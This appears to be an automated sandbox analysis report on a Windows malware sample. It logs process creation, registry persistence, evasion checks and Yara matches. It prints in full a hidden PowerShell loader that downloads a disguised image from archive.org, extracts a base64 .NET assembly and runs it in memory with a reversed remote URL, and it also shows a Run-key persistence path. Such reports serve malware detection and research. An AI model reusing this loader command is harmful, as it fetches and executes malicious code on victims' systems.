? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C4? ? ? ? ?R? ? ? ? ?Bv? ? ? ? ?Hc? ? ? ? ?bgBs? ? ? ? ?G8? ? ? ? ?YQBk? ? ? ? ?EQ? ? ? ? ?YQB0? ? ? ? ?GE? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBV? ? ? ? ?HI? ? ? ? ?b? ? ? ? ?? ? ? ? ?p? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?g? ? ? ? ?D0? ? ? ? ?I? ? ? ? ?Bb? ? ? ? ?FM? ? ? ? ?eQBz? ? ? ? ?HQ? ? ? ? ?ZQBt? ? ? ? ?C4? ? ? ? ?V? ? ? ? ?Bl? ? ? ? ?Hg? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EU? ? ? ? ?bgBj? ? ? ? ?G8? ? ? ? ?Z? ? ? ? ?Bp? ? ? ? ?G4? ? ? ? ?ZwBd? ? ? ? ?Do? ? ? ? ?OgBV? ? ? ? ?FQ? ? ? ? ?Rg? ? ? ? ?4? ? ? ? ?C4? ? ? ? ?RwBl? ? ? ? ?HQ? ? ? ? ?UwB0? ? ? ? ?HI? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?K? ? ? ? ?? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?cwB0? ? ? ? ?GE? ? ? ? ?cgB0? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? ? ? ? ?FM? ? ? ? ?RQ? ? ? ? ?2? ? ? ? ?DQ? ? ? ? ?XwBT? ? ? ? ?FQ? ? ? ? ?QQBS? ? ? ? ?FQ? ? ? ? ?Pg? ? ? ? ?+? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?GU? ? ? ? ?bgBk? ? ? ? ?EY? ? ? ? ?b? ? ? ? ?Bh? ? ? ? ?Gc? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?Jw? ? ? ? ?8? ? ? ? ?Dw? ? ? ? ?QgBB? Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yks/nimda-pw/eg.osam//:sptth' , '1' , 'C:\ProgramData\' , 'neuromo','AddInProcess32','desativado'))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F200BD pushad ; iretd 2_2_00007FF848F200C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848F200BD pushad ; iretd 4_2_00007FF848F200C1

        Boot Survival

        barindex
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\neuromo.jsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PathJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1999Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 354Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3230Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6546Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888Thread sleep count: 3230 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1220Thread sleep count: 6546 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968Thread sleep time: -16602069666338586s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: powershell.exe, 00000004.00000002.2221743469.000001C26C990000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
        Source: wscript.exe, 00000000.00000002.2059973474.0000027BE47AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Yara matchFile source: amsi64_6800.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5752, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6800, type: MEMORYSTR
